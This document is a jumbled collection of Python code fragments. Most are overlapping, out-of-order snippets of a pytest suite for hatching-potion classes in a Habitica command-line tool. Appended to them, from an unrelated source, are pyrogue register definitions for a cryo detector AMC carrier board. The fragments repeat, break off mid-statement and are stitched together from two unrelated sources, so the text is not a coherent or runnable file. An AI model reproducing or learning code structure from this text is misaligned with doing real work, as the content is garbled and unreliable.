"potion.is_standard_hatch_potion() is False assert potion.is_magic_hatch_potion() is True assert potion.is_wacky_hatch_potion() is False @pytest.mark.parametrize(\"potion_name,quantity\", [",
"collection[\"Moonglow\"] == HatchPotion(\"Moonglow\", quantity=42) assert collection[\"Sunset\"] == HatchPotion(\"Sunset\", quantity=2) def test__eq__ok(self): left =",
"== HatchPotion(potion1, quantity=quantity1) assert next(generator) == HatchPotion(potion2, quantity=quantity2) assert next(generator) == HatchPotion(potion3, quantity=quantity3)",
"= collection.values() assert next(generator) == HatchPotion(potion1, quantity=quantity1) assert next(generator) == HatchPotion(potion2, quantity=quantity2) assert",
"== HatchPotion(potion2, quantity=quantity2) assert next(generator) == HatchPotion(potion3, quantity=quantity3) with pytest.raises(StopIteration): _ = next(generator)",
"test_remove_hatch_potion_ok(self): potion1_quantity = 3 potion2_quantity = 42 potion3_name, potion3_quantity = \"Sunset\", 1 collection",
"False assert potion.is_magic_hatch_potion() is False assert potion.is_wacky_hatch_potion() is True class TestHatchPotionCollection: def test__init__empty_ok(self):",
"quantity: int): with pytest.raises(HatchPotionException) as exec_info: HatchPotion(potion_name, quantity=quantity) assert str(exec_info.value).startswith(f\"{quantity} is below 0.\")",
"assert collection[\"Base\"] == HatchPotion(\"Base\", quantity=1) assert collection[\"Moonglow\"] == HatchPotion(\"Moonglow\", quantity=42) assert collection[\"Sunset\"] ==",
"quantity=potion2_quantity - 1) assert collection[potion3_name] == HatchPotion(potion3_name, quantity=potion3_quantity - 1) def test_remove_hatch_potion_not_available_faile(self): collection",
"quantity=quantity) result: str = repr(potion) assert result == f\"HatchPotion({potion_name}: {quantity})\" def test__eq__(self): assert",
"42, \"Sunset\": 0}) assert collection[\"Base\"] == HatchPotion(\"Base\", quantity=1) assert collection[\"Moonglow\"] == HatchPotion(\"Moonglow\", quantity=42)",
"False @pytest.mark.parametrize(\"potion_name,quantity\", [ (\"BirchBark\", 10), (\"Windup\", 1), (\"Vampire\", 0), (\"Ruby\", 9), (\"Amber\", 69),",
"42, \"Sunset\": 2} collection = HatchPotionCollection(potion_dict) assert collection[\"Base\"] == HatchPotion(\"Base\", quantity=0) assert collection[\"Moonglow\"]",
"\"Sunshine\", 41 potion3, quantity3 = \"Vampire\", 3 collection = HatchPotionCollection({ potion1: quantity1, potion2:",
"== HatchPotionCollection({}) assert len(collection) == 0 def test__init__ok(self): potion_dict = {\"Base\": 0, \"Moonglow\":",
"\"StainedGlass\", 2 collection = HatchPotionCollection({ potion1: quantity1, potion2: quantity2, potion3: quantity3 }) generator",
"= 10 class TestHatchPotion: def test__init__invalid_name_fail(self): name = \"InvalidName\" with pytest.raises(HatchPotionException) as exec_info:",
"= HatchPotion(potion_name, quantity=quantity) assert potion.is_standard_hatch_potion() is False assert potion.is_magic_hatch_potion() is True assert potion.is_wacky_hatch_potion()",
"quantity=quantity3) with pytest.raises(StopIteration): _ = next(generator) def test_values_as_list_ok(self): potion1, quantity1 = \"Golden\", 1",
"list(zip(random.sample(HatchPotionData.hatch_potion_names, k=_SAMPLE_SIZE), range(0, _SAMPLE_SIZE))) ) def test__repr__ok(self, potion_name: str, quantity: int): potion =",
"1), (\"Vampire\", 0), (\"Ruby\", 9), (\"Amber\", 69), (\"MossyStone\", 42), (\"SolarSystem\", 9001), ]) def",
"python3 import random from typing import List import click import pytest from hopla.hoplalib.errors",
"quantity=quantity2), HatchPotion(potion3, quantity=quantity3) ] assert result == expected def test_remove_hatch_potion_ok(self): potion1_quantity = 3",
"collection = HatchPotionCollection({ potion1: quantity1, potion2: quantity2, potion3: quantity3 }) generator = collection.values()",
"HatchPotion(potion_name, quantity=quantity) assert potion.is_standard_hatch_potion() is False assert potion.is_magic_hatch_potion() is True assert potion.is_wacky_hatch_potion() is",
"collection = HatchPotionCollection({\"Base\": 1, \"Moonglow\": 42, \"Sunset\": 2}) iterator = iter(collection) assert next(iterator)",
"\"Frost\": 2}) assert left != right assert HatchPotionCollection() == HatchPotionCollection() assert HatchPotionCollection({\"StarryNight\": 1})",
"0.\") assert exec_info.errisinstance((YouFoundABugRewardError, click.ClickException)) @pytest.mark.parametrize( \"potion_name,quantity\", list(zip(random.sample(HatchPotionData.hatch_potion_names, k=_SAMPLE_SIZE), range(0, _SAMPLE_SIZE))) ) def test__repr__ok(self,",
"class TestHatchPotionCollection: def test__init__empty_ok(self): collection = HatchPotionCollection() assert collection == HatchPotionCollection({}) assert len(collection)",
"quantity2 = \"MossyStone\", 1 potion3, quantity3 = \"StainedGlass\", 2 collection = HatchPotionCollection({ potion1:",
"potion3_quantity = \"Sunset\", 1 collection = HatchPotionCollection({ \"Base\": potion1_quantity, \"Moonglow\": potion2_quantity, potion3_name: potion3_quantity",
"is True assert potion.is_wacky_hatch_potion() is False @pytest.mark.parametrize(\"potion_name,quantity\", [ (\"Veggie\", 10), (\"Dessert\", 0), ])",
"_SAMPLE_SIZE))) ) def test__repr__ok(self, potion_name: str, quantity: int): potion = HatchPotion(potion_name, quantity=quantity) result:",
"assert next(iterator) == \"Base\" assert next(iterator) == \"Moonglow\" assert next(iterator) == \"Sunset\" with",
"\"Moonglow\" with pytest.raises(HatchPotionException) as exec_info: collection.remove_hatch_potion(HatchPotion(not_found_potion_name)) expected_msg = f\"{not_found_potion_name} was not in the",
"= \"StainedGlass\", 2 collection = HatchPotionCollection({ potion1: quantity1, potion2: quantity2, potion3: quantity3 })",
"quantity=quantity) assert str(exec_info.value).startswith(f\"{quantity} is below 0.\") assert exec_info.errisinstance((YouFoundABugRewardError, click.ClickException)) @pytest.mark.parametrize( \"potion_name,quantity\", list(zip(random.sample(HatchPotionData.hatch_potion_names, k=_SAMPLE_SIZE),",
"potion1: quantity1, potion2: quantity2, potion3: quantity3 }) result: List[HatchPotion] = list(collection.values()) expected: List[HatchPotion]",
"name = \"InvalidName\" with pytest.raises(HatchPotionException) as exec_info: HatchPotion(name, quantity=1) assert str(exec_info.value).startswith(f\"{name} is not",
"def test__init__invalid_name_fail(self): name = \"InvalidName\" with pytest.raises(HatchPotionException) as exec_info: HatchPotion(name, quantity=1) assert str(exec_info.value).startswith(f\"{name}",
"potion.is_wacky_hatch_potion() is True class TestHatchPotionCollection: def test__init__empty_ok(self): collection = HatchPotionCollection() assert collection ==",
"(\"Base\", 10), (\"CottonCandyBlue\", 1), (\"Golden\", 0), ]) def test_is_standard_potion(self, potion_name: str, quantity: int):",
"HatchPotionException _SAMPLE_SIZE = 10 class TestHatchPotion: def test__init__invalid_name_fail(self): name = \"InvalidName\" with pytest.raises(HatchPotionException)",
"HatchPotion(name, quantity=1) assert str(exec_info.value).startswith(f\"{name} is not a valid hatching potion name.\") assert exec_info.errisinstance((YouFoundABugRewardError,",
"potion_dict = {\"Base\": 0, \"Moonglow\": 42, \"Sunset\": 2} collection = HatchPotionCollection(potion_dict) assert collection[\"Base\"]",
"1) assert collection[\"Moonglow\"] == HatchPotion(\"Moonglow\", quantity=potion2_quantity - 1) assert collection[potion3_name] == HatchPotion(potion3_name, quantity=potion3_quantity",
"1) def test_remove_hatch_potion_not_available_faile(self): collection = HatchPotionCollection({\"Base\": 1}) not_found_potion_name = \"Moonglow\" with pytest.raises(HatchPotionException) as",
"2}) assert left != right assert HatchPotionCollection() == HatchPotionCollection() assert HatchPotionCollection({\"StarryNight\": 1}) !=",
"potion2, quantity2 = \"MossyStone\", 1 potion3, quantity3 = \"StainedGlass\", 2 collection = HatchPotionCollection({",
"True class TestHatchPotionCollection: def test__init__empty_ok(self): collection = HatchPotionCollection() assert collection == HatchPotionCollection({}) assert",
"HatchPotion(\"Moonglow\", quantity=42) assert collection[\"Sunset\"] == HatchPotion(\"Sunset\", quantity=0) def test_values_ok(self): potion1, quantity1 = \"Dessert\",",
"HatchPotion(potion_name, quantity=quantity) result: str = repr(potion) assert result == f\"HatchPotion({potion_name}: {quantity})\" def test__eq__(self):",
"quantity: int): potion = HatchPotion(potion_name, quantity=quantity) assert potion.is_standard_hatch_potion() is True assert potion.is_magic_hatch_potion() is",
"not_found_potion_name = \"Moonglow\" with pytest.raises(HatchPotionException) as exec_info: collection.remove_hatch_potion(HatchPotion(not_found_potion_name)) expected_msg = f\"{not_found_potion_name} was not",
"10), (\"Windup\", 1), (\"Vampire\", 0), (\"Ruby\", 9), (\"Amber\", 69), (\"MossyStone\", 42), (\"SolarSystem\", 9001),",
"assert exec_info.errisinstance((YouFoundABugRewardError, click.ClickException)) @pytest.mark.parametrize( \"potion_name,quantity\", list(zip(random.sample(HatchPotionData.hatch_potion_names, k=_SAMPLE_SIZE), range(0, _SAMPLE_SIZE))) ) def test__repr__ok(self, potion_name:",
"potion.is_magic_hatch_potion() is True assert potion.is_wacky_hatch_potion() is False @pytest.mark.parametrize(\"potion_name,quantity\", [ (\"Veggie\", 10), (\"Dessert\", 0),",
"\"Dessert\", 10 potion2, quantity2 = \"MossyStone\", 1 potion3, quantity3 = \"StainedGlass\", 2 collection",
"quantity=42) assert collection[\"Sunset\"] == HatchPotion(\"Sunset\", quantity=0) def test_values_ok(self): potion1, quantity1 = \"Dessert\", 10",
"False assert potion.is_wacky_hatch_potion() is False @pytest.mark.parametrize(\"potion_name,quantity\", [ (\"BirchBark\", 10), (\"Windup\", 1), (\"Vampire\", 0),",
"HatchPotion(potion_name, quantity=quantity) assert str(exec_info.value).startswith(f\"{quantity} is below 0.\") assert exec_info.errisinstance((YouFoundABugRewardError, click.ClickException)) @pytest.mark.parametrize( \"potion_name,quantity\", list(zip(random.sample(HatchPotionData.hatch_potion_names,",
"quantity1 = \"Dessert\", 10 potion2, quantity2 = \"MossyStone\", 1 potion3, quantity3 = \"StainedGlass\",",
"2}) == HatchPotionCollection({\"Windup\": 2}) assert HatchPotionCollection({\"Frost\": 1}) != HatchPotionCollection({\"Frost\": 2}) def test__iter__ok(self): collection",
"assert collection[\"Base\"] == HatchPotion(\"Base\", quantity=0) assert collection[\"Moonglow\"] == HatchPotion(\"Moonglow\", quantity=42) assert collection[\"Sunset\"] ==",
"\"Glow\": 1}) right = HatchPotionCollection({\"Glow\": 1, \"Frost\": 2}) assert left != right assert",
"import List import click import pytest from hopla.hoplalib.errors import YouFoundABugRewardError from hopla.hoplalib.hatchery.hatchdata import",
"1, \"Moonglow\": 42, \"Sunset\": 0}) assert collection[\"Base\"] == HatchPotion(\"Base\", quantity=1) assert collection[\"Moonglow\"] ==",
"click.ClickException)) @pytest.mark.parametrize( \"potion_name,quantity\", list(zip(random.sample(HatchPotionData.hatch_potion_names, k=_SAMPLE_SIZE), range(-_SAMPLE_SIZE, 0))) ) def test__init__invalid_quantity_fail(self, potion_name: str, quantity:",
"HatchPotion(\"Red\") assert HatchPotion(\"Shimmer\", quantity=1) == HatchPotion(\"Shimmer\") assert HatchPotion(\"Silver\") != HatchPotion(\"Silver\", quantity=2) assert HatchPotion(\"Watery\")",
"as exec_info: HatchPotion(name, quantity=1) assert str(exec_info.value).startswith(f\"{name} is not a valid hatching potion name.\")",
"HatchPotion(\"Base\", quantity=potion1_quantity - 1) assert collection[\"Moonglow\"] == HatchPotion(\"Moonglow\", quantity=potion2_quantity - 1) assert collection[potion3_name]",
"1}) right = HatchPotionCollection({\"Glow\": 1, \"Frost\": 2}) assert left != right assert HatchPotionCollection()",
"potion.is_magic_hatch_potion() is False assert potion.is_wacky_hatch_potion() is True class TestHatchPotionCollection: def test__init__empty_ok(self): collection =",
"(\"Dessert\", 0), ]) def test_is_wacky_hatch_potion(self, potion_name: str, quantity: int): potion = HatchPotion(potion_name, quantity=quantity)",
"potion3_name: potion3_quantity }) collection.remove_hatch_potion(HatchPotion(\"Base\")) collection.remove_hatch_potion(HatchPotion(\"Moonglow\")) collection.remove_hatch_potion(HatchPotion(potion3_name)) assert collection[\"Base\"] == HatchPotion(\"Base\", quantity=potion1_quantity - 1)",
"is False @pytest.mark.parametrize(\"potion_name,quantity\", [ (\"Veggie\", 10), (\"Dessert\", 0), ]) def test_is_wacky_hatch_potion(self, potion_name: str,",
"HatchPotion(\"Moonglow\", quantity=potion2_quantity - 1) assert collection[potion3_name] == HatchPotion(potion3_name, quantity=potion3_quantity - 1) def test_remove_hatch_potion_not_available_faile(self):",
"!= right assert HatchPotionCollection() == HatchPotionCollection() assert HatchPotionCollection({\"StarryNight\": 1}) != HatchPotionCollection() assert HatchPotionCollection({\"Windup\":",
"HatchPotionCollection({\"Base\": 1}) not_found_potion_name = \"Moonglow\" with pytest.raises(HatchPotionException) as exec_info: collection.remove_hatch_potion(HatchPotion(not_found_potion_name)) expected_msg = f\"{not_found_potion_name}",
"\"Sunset\": 2} collection = HatchPotionCollection(potion_dict) assert collection[\"Base\"] == HatchPotion(\"Base\", quantity=0) assert collection[\"Moonglow\"] ==",
"\"Vampire\", 3 collection = HatchPotionCollection({ potion1: quantity1, potion2: quantity2, potion3: quantity3 }) result:",
"HatchPotion(\"Sunset\", quantity=0) def test_values_ok(self): potion1, quantity1 = \"Dessert\", 10 potion2, quantity2 = \"MossyStone\",",
"assert potion.is_wacky_hatch_potion() is False @pytest.mark.parametrize(\"potion_name,quantity\", [ (\"BirchBark\", 10), (\"Windup\", 1), (\"Vampire\", 0), (\"Ruby\",",
"HatchPotion(\"Shimmer\", quantity=1) == HatchPotion(\"Shimmer\") assert HatchPotion(\"Silver\") != HatchPotion(\"Silver\", quantity=2) assert HatchPotion(\"Watery\") != HatchPotion(\"Glow\")",
"right = HatchPotionCollection({\"Glow\": 1, \"Frost\": 2}) assert left != right assert HatchPotionCollection() ==",
"]) def test_is_wacky_hatch_potion(self, potion_name: str, quantity: int): potion = HatchPotion(potion_name, quantity=quantity) assert potion.is_standard_hatch_potion()",
"left = HatchPotionCollection({\"Frost\": 1, \"Glow\": 1}) right = HatchPotionCollection({\"Glow\": 1, \"Frost\": 2}) assert",
"str(exec_info.value).startswith(f\"{quantity} is below 0.\") assert exec_info.errisinstance((YouFoundABugRewardError, click.ClickException)) @pytest.mark.parametrize( \"potion_name,quantity\", list(zip(random.sample(HatchPotionData.hatch_potion_names, k=_SAMPLE_SIZE), range(0, _SAMPLE_SIZE)))",
"valid hatching potion name.\") assert exec_info.errisinstance((YouFoundABugRewardError, click.ClickException)) @pytest.mark.parametrize( \"potion_name,quantity\", list(zip(random.sample(HatchPotionData.hatch_potion_names, k=_SAMPLE_SIZE), range(-_SAMPLE_SIZE, 0)))",
"assert collection[potion3_name] == HatchPotion(potion3_name, quantity=potion3_quantity - 1) def test_remove_hatch_potion_not_available_faile(self): collection = HatchPotionCollection({\"Base\": 1})",
"collection = HatchPotionCollection({\"Base\": 1, \"Moonglow\": 42, \"Sunset\": 0}) assert collection[\"Base\"] == HatchPotion(\"Base\", quantity=1)",
"next(iterator) == \"Moonglow\" assert next(iterator) == \"Sunset\" with pytest.raises(StopIteration): next(iterator) def test__getitem__ok(self): collection",
"test__init__ok(self): potion_dict = {\"Base\": 0, \"Moonglow\": 42, \"Sunset\": 2} collection = HatchPotionCollection(potion_dict) assert",
"3 potion2_quantity = 42 potion3_name, potion3_quantity = \"Sunset\", 1 collection = HatchPotionCollection({ \"Base\":",
"= HatchPotionCollection({ potion1: quantity1, potion2: quantity2, potion3: quantity3 }) result: List[HatchPotion] = list(collection.values())",
"- 1) assert collection[\"Moonglow\"] == HatchPotion(\"Moonglow\", quantity=potion2_quantity - 1) assert collection[potion3_name] == HatchPotion(potion3_name,",
"assert potion.is_magic_hatch_potion() is False assert potion.is_wacky_hatch_potion() is True class TestHatchPotionCollection: def test__init__empty_ok(self): collection",
"= repr(potion) assert result == f\"HatchPotion({potion_name}: {quantity})\" def test__eq__(self): assert HatchPotion(\"Red\") == HatchPotion(\"Red\")",
"quantity: int): potion = HatchPotion(potion_name, quantity=quantity) result: str = repr(potion) assert result ==",
"quantity=potion1_quantity - 1) assert collection[\"Moonglow\"] == HatchPotion(\"Moonglow\", quantity=potion2_quantity - 1) assert collection[potion3_name] ==",
"41 potion3, quantity3 = \"Vampire\", 3 collection = HatchPotionCollection({ potion1: quantity1, potion2: quantity2,",
"is below 0.\") assert exec_info.errisinstance((YouFoundABugRewardError, click.ClickException)) @pytest.mark.parametrize( \"potion_name,quantity\", list(zip(random.sample(HatchPotionData.hatch_potion_names, k=_SAMPLE_SIZE), range(0, _SAMPLE_SIZE))) )",
"quantity=quantity) assert potion.is_standard_hatch_potion() is False assert potion.is_magic_hatch_potion() is False assert potion.is_wacky_hatch_potion() is True",
"\"Base\" assert next(iterator) == \"Moonglow\" assert next(iterator) == \"Sunset\" with pytest.raises(StopIteration): next(iterator) def",
"quantity2 = \"Sunshine\", 41 potion3, quantity3 = \"Vampire\", 3 collection = HatchPotionCollection({ potion1:",
"is False assert potion.is_magic_hatch_potion() is False assert potion.is_wacky_hatch_potion() is True class TestHatchPotionCollection: def",
"2}) assert HatchPotionCollection({\"Frost\": 1}) != HatchPotionCollection({\"Frost\": 2}) def test__iter__ok(self): collection = HatchPotionCollection({\"Base\": 1,",
"quantity2, potion3: quantity3 }) generator = collection.values() assert next(generator) == HatchPotion(potion1, quantity=quantity1) assert",
"HatchPotion(\"Sunset\", quantity=2) def test__eq__ok(self): left = HatchPotionCollection({\"Frost\": 1, \"Glow\": 1}) right = HatchPotionCollection({\"Glow\":",
"import HatchPotionData from hopla.hoplalib.hatchery.hatchpotionmodels import HatchPotion, HatchPotionCollection, \\ HatchPotionException _SAMPLE_SIZE = 10 class",
"= 42 potion3_name, potion3_quantity = \"Sunset\", 1 collection = HatchPotionCollection({ \"Base\": potion1_quantity, \"Moonglow\":",
"1, \"Moonglow\": 42, \"Sunset\": 2}) iterator = iter(collection) assert next(iterator) == \"Base\" assert",
"quantity=quantity2) assert next(generator) == HatchPotion(potion3, quantity=quantity3) with pytest.raises(StopIteration): _ = next(generator) def test_values_as_list_ok(self):",
"assert collection[\"Moonglow\"] == HatchPotion(\"Moonglow\", quantity=42) assert collection[\"Sunset\"] == HatchPotion(\"Sunset\", quantity=2) def test__eq__ok(self): left",
"potion = HatchPotion(potion_name, quantity=quantity) assert potion.is_standard_hatch_potion() is True assert potion.is_magic_hatch_potion() is False assert",
"HatchPotion(\"Base\", quantity=0) assert collection[\"Moonglow\"] == HatchPotion(\"Moonglow\", quantity=42) assert collection[\"Sunset\"] == HatchPotion(\"Sunset\", quantity=2) def",
"assert collection == HatchPotionCollection({}) assert len(collection) == 0 def test__init__ok(self): potion_dict = {\"Base\":",
"= HatchPotion(potion_name, quantity=quantity) assert potion.is_standard_hatch_potion() is True assert potion.is_magic_hatch_potion() is False assert potion.is_wacky_hatch_potion()",
"List[HatchPotion] = [ HatchPotion(potion1, quantity=quantity1), HatchPotion(potion2, quantity=quantity2), HatchPotion(potion3, quantity=quantity3) ] assert result ==",
"quantity=quantity) assert potion.is_standard_hatch_potion() is True assert potion.is_magic_hatch_potion() is False assert potion.is_wacky_hatch_potion() is False",
"HatchPotion(potion3_name, quantity=potion3_quantity - 1) def test_remove_hatch_potion_not_available_faile(self): collection = HatchPotionCollection({\"Base\": 1}) not_found_potion_name = \"Moonglow\"",
"potion.is_wacky_hatch_potion() is False @pytest.mark.parametrize(\"potion_name,quantity\", [ (\"Veggie\", 10), (\"Dessert\", 0), ]) def test_is_wacky_hatch_potion(self, potion_name:",
"with pytest.raises(StopIteration): next(iterator) def test__getitem__ok(self): collection = HatchPotionCollection({\"Base\": 1, \"Moonglow\": 42, \"Sunset\": 0})",
"next(iterator) == \"Sunset\" with pytest.raises(StopIteration): next(iterator) def test__getitem__ok(self): collection = HatchPotionCollection({\"Base\": 1, \"Moonglow\":",
"not a valid hatching potion name.\") assert exec_info.errisinstance((YouFoundABugRewardError, click.ClickException)) @pytest.mark.parametrize( \"potion_name,quantity\", list(zip(random.sample(HatchPotionData.hatch_potion_names, k=_SAMPLE_SIZE),",
"quantity=quantity) assert potion.is_standard_hatch_potion() is False assert potion.is_magic_hatch_potion() is True assert potion.is_wacky_hatch_potion() is False",
"False assert potion.is_magic_hatch_potion() is True assert potion.is_wacky_hatch_potion() is False @pytest.mark.parametrize(\"potion_name,quantity\", [ (\"Veggie\", 10),",
"result == f\"HatchPotion({potion_name}: {quantity})\" def test__eq__(self): assert HatchPotion(\"Red\") == HatchPotion(\"Red\") assert HatchPotion(\"Shimmer\", quantity=1)",
"int): potion = HatchPotion(potion_name, quantity=quantity) assert potion.is_standard_hatch_potion() is False assert potion.is_magic_hatch_potion() is True",
"= 3 potion2_quantity = 42 potion3_name, potion3_quantity = \"Sunset\", 1 collection = HatchPotionCollection({",
"str, quantity: int): with pytest.raises(HatchPotionException) as exec_info: HatchPotion(potion_name, quantity=quantity) assert str(exec_info.value).startswith(f\"{quantity} is below",
"def test__init__invalid_quantity_fail(self, potion_name: str, quantity: int): with pytest.raises(HatchPotionException) as exec_info: HatchPotion(potion_name, quantity=quantity) assert",
"assert collection[\"Sunset\"] == HatchPotion(\"Sunset\", quantity=2) def test__eq__ok(self): left = HatchPotionCollection({\"Frost\": 1, \"Glow\": 1})",
"= \"Sunshine\", 41 potion3, quantity3 = \"Vampire\", 3 collection = HatchPotionCollection({ potion1: quantity1,",
"HatchPotionCollection() == HatchPotionCollection() assert HatchPotionCollection({\"StarryNight\": 1}) != HatchPotionCollection() assert HatchPotionCollection({\"Windup\": 2}) == HatchPotionCollection({\"Windup\":",
"10), (\"Dessert\", 0), ]) def test_is_wacky_hatch_potion(self, potion_name: str, quantity: int): potion = HatchPotion(potion_name,",
"hopla.hoplalib.hatchery.hatchdata import HatchPotionData from hopla.hoplalib.hatchery.hatchpotionmodels import HatchPotion, HatchPotionCollection, \\ HatchPotionException _SAMPLE_SIZE = 10",
"pytest.raises(StopIteration): next(iterator) def test__getitem__ok(self): collection = HatchPotionCollection({\"Base\": 1, \"Moonglow\": 42, \"Sunset\": 0}) assert",
"with pytest.raises(StopIteration): _ = next(generator) def test_values_as_list_ok(self): potion1, quantity1 = \"Golden\", 1 potion2,",
"\"potion_name,quantity\", list(zip(random.sample(HatchPotionData.hatch_potion_names, k=_SAMPLE_SIZE), range(-_SAMPLE_SIZE, 0))) ) def test__init__invalid_quantity_fail(self, potion_name: str, quantity: int): with",
"2}) def test__iter__ok(self): collection = HatchPotionCollection({\"Base\": 1, \"Moonglow\": 42, \"Sunset\": 2}) iterator =",
"is False assert potion.is_magic_hatch_potion() is True assert potion.is_wacky_hatch_potion() is False @pytest.mark.parametrize(\"potion_name,quantity\", [ (\"Veggie\",",
"HatchPotionCollection() assert collection == HatchPotionCollection({}) assert len(collection) == 0 def test__init__ok(self): potion_dict =",
"42 potion3_name, potion3_quantity = \"Sunset\", 1 collection = HatchPotionCollection({ \"Base\": potion1_quantity, \"Moonglow\": potion2_quantity,",
"import pytest from hopla.hoplalib.errors import YouFoundABugRewardError from hopla.hoplalib.hatchery.hatchdata import HatchPotionData from hopla.hoplalib.hatchery.hatchpotionmodels import",
"potion = HatchPotion(potion_name, quantity=quantity) assert potion.is_standard_hatch_potion() is False assert potion.is_magic_hatch_potion() is True assert",
"HatchPotionCollection() assert HatchPotionCollection({\"StarryNight\": 1}) != HatchPotionCollection() assert HatchPotionCollection({\"Windup\": 2}) == HatchPotionCollection({\"Windup\": 2}) assert",
"assert collection[\"Moonglow\"] == HatchPotion(\"Moonglow\", quantity=42) assert collection[\"Sunset\"] == HatchPotion(\"Sunset\", quantity=0) def test_values_ok(self): potion1,",
"!= HatchPotionCollection() assert HatchPotionCollection({\"Windup\": 2}) == HatchPotionCollection({\"Windup\": 2}) assert HatchPotionCollection({\"Frost\": 1}) != HatchPotionCollection({\"Frost\":",
"HatchPotionCollection({ potion1: quantity1, potion2: quantity2, potion3: quantity3 }) generator = collection.values() assert next(generator)",
"str, quantity: int): potion = HatchPotion(potion_name, quantity=quantity) assert potion.is_standard_hatch_potion() is True assert potion.is_magic_hatch_potion()",
"collection.values() assert next(generator) == HatchPotion(potion1, quantity=quantity1) assert next(generator) == HatchPotion(potion2, quantity=quantity2) assert next(generator)",
"\"Golden\", 1 potion2, quantity2 = \"Sunshine\", 41 potion3, quantity3 = \"Vampire\", 3 collection",
"\"Base\": potion1_quantity, \"Moonglow\": potion2_quantity, potion3_name: potion3_quantity }) collection.remove_hatch_potion(HatchPotion(\"Base\")) collection.remove_hatch_potion(HatchPotion(\"Moonglow\")) collection.remove_hatch_potion(HatchPotion(potion3_name)) assert collection[\"Base\"] ==",
"test__eq__ok(self): left = HatchPotionCollection({\"Frost\": 1, \"Glow\": 1}) right = HatchPotionCollection({\"Glow\": 1, \"Frost\": 2})",
"import HatchPotion, HatchPotionCollection, \\ HatchPotionException _SAMPLE_SIZE = 10 class TestHatchPotion: def test__init__invalid_name_fail(self): name",
"def test__init__ok(self): potion_dict = {\"Base\": 0, \"Moonglow\": 42, \"Sunset\": 2} collection = HatchPotionCollection(potion_dict)",
"next(generator) == HatchPotion(potion3, quantity=quantity3) with pytest.raises(StopIteration): _ = next(generator) def test_values_as_list_ok(self): potion1, quantity1",
"\"Sunset\": 2}) iterator = iter(collection) assert next(iterator) == \"Base\" assert next(iterator) == \"Moonglow\"",
") def test__init__invalid_quantity_fail(self, potion_name: str, quantity: int): with pytest.raises(HatchPotionException) as exec_info: HatchPotion(potion_name, quantity=quantity)"
] |
[
"is subject to # the license terms in the LICENSE.txt file found in",
"triggers\", offset = 0x0000000C, bitSize = 32, bitOffset = 0, base = pr.UInt,",
"base = pr.UInt, mode = \"WO\", hidden = True, )) self.add(StreamControl( offset=0x03000000, ))",
"0x0000000C, bitSize = 32, bitOffset = 0, base = pr.UInt, mode = \"RO\",",
"\"EofeCounter\", description = \"Stream EOFE counter\", offset = 0x00000010, bitSize = 32, bitOffset",
"name = \"MicrowaveMuxCore[%i]\" % (i), # offset = (i*0x00100000), # expand = True,",
"pr.UInt, mode = \"RW\", )) self.add(pr.RemoteVariable( name = \"StreamCounterRst\", description = \"Reset stream",
"= \"EofeCounterRst\", description = \"Reset stream EOFE\", offset = 0x00000008, bitSize = 1,",
"license terms in the LICENSE.txt file found in the top-level directory # of",
"\"StreamCounter\", description = \"Count number of stream triggers\", offset = 0x0000000C, bitSize =",
"self.add(pr.RemoteVariable( name = \"EofeCounterRst\", description = \"Reset stream EOFE\", offset = 0x00000008, bitSize",
"[0,0], **kwargs): super().__init__(name=name, description=description, **kwargs) ######### # Devices ######### # for i in",
"((numRxLanes[i] > 0) or (numTxLanes[i] > 0)): # self.add(AmcMicrowaveMuxCore( # name = \"MicrowaveMuxCore[%i]\"",
"base = pr.Int, mode = \"RW\", )) class StreamControl(pr.Device): def __init__( self, name",
"# Registers ########### self.add(pr.RemoteVariable( name = \"DacSigTrigDelay\", description = \"DacSig TrigDelay\", offset =",
"AppCore.py # Created : 2017-04-03 #----------------------------------------------------------------------------- # Description: # PyRogue AMC Carrier Cryo",
"bitSize = 1, bitOffset = 0, base = pr.UInt, mode = \"WO\", hidden",
"i in range(4096): self.add(pr.RemoteVariable( name = f'StreamData[{i}]', description = \"Dummy stream data\", offset",
"this distribution and at: # https://confluence.slac.stanford.edu/display/ppareg/LICENSE.html. # No part of the rogue software",
"top-level directory # of this distribution and at: # https://confluence.slac.stanford.edu/display/ppareg/LICENSE.html. # No part",
"24, bitOffset = 0, base = pr.UInt, mode = \"RW\", units = \"1/(307MHz)\",",
"= \"EnableStream\", offset = 0x00000008, bitSize = 1, bitOffset = 0, base =",
"expand = True, # )) # # self.add(SysgenCryo(offset=0x01000000, expand=True)) self.add(SimRtmCryoDet( offset=0x02000000, expand=False)) ###########",
"of the rogue software platform. It is subject to # the license terms",
"\"RW\", )) self.add(pr.RemoteVariable( name = \"EofeCounterRst\", description = \"Reset stream EOFE\", offset =",
"Created : 2017-04-03 #----------------------------------------------------------------------------- # Description: # PyRogue AMC Carrier Cryo Demo Board",
"= \"DacSigTrigArm\", description = \"DacSig TrigArm\", offset = 0x03000004, bitSize = 1, bitOffset",
"number of stream triggers\", offset = 0x0000000C, bitSize = 32, bitOffset = 0,",
"description=description, **kwargs) ######### # Devices self.add(pr.RemoteVariable( name = \"EnableStreams\", description = \"EnableStream\", offset",
"= 9, base = pr.UInt, mode = \"RW\", )) self.add(pr.RemoteVariable( name = \"StreamCounter\",",
"in range(4096): self.add(pr.RemoteVariable( name = f'StreamData[{i}]', description = \"Dummy stream data\", offset =",
"9, base = pr.UInt, mode = \"RW\", )) self.add(pr.RemoteVariable( name = \"StreamCounter\", description",
"range(4096): self.add(pr.RemoteVariable( name = f'StreamData[{i}]', description = \"Dummy stream data\", offset = 0x000000",
"True, )) self.add(StreamControl( offset=0x03000000, )) self.add(StreamData( offset=0x04000000, expand=False, )) ############################## # Commands ##############################",
"control\", **kwargs): super().__init__(name=name, description=description, **kwargs) ######### # Devices for i in range(4096): self.add(pr.RemoteVariable(",
"= True, # )) # # self.add(SysgenCryo(offset=0x01000000, expand=True)) self.add(SimRtmCryoDet( offset=0x02000000, expand=False)) ########### #",
"# Devices self.add(pr.RemoteVariable( name = \"EnableStreams\", description = \"EnableStream\", offset = 0x00000008, bitSize",
"self, name = \"StreamReg\", description = \"Stream control\", **kwargs): super().__init__(name=name, description=description, **kwargs) #########",
"= 1, bitOffset = 0, base = pr.UInt, mode = \"RW\", )) self.add(pr.RemoteVariable(",
"#----------------------------------------------------------------------------- # This file is part of the rogue software platform. It is",
"(i*0x00100000), # expand = True, # )) # # self.add(SysgenCryo(offset=0x01000000, expand=True)) self.add(SimRtmCryoDet( offset=0x02000000,",
"bitSize = 1, bitOffset = 0, base = pr.UInt, mode = \"RW\", ))",
"may be # copied, modified, propagated, or distributed except according to the terms",
"Devices ######### # for i in range(2): # if ((numRxLanes[i] > 0) or",
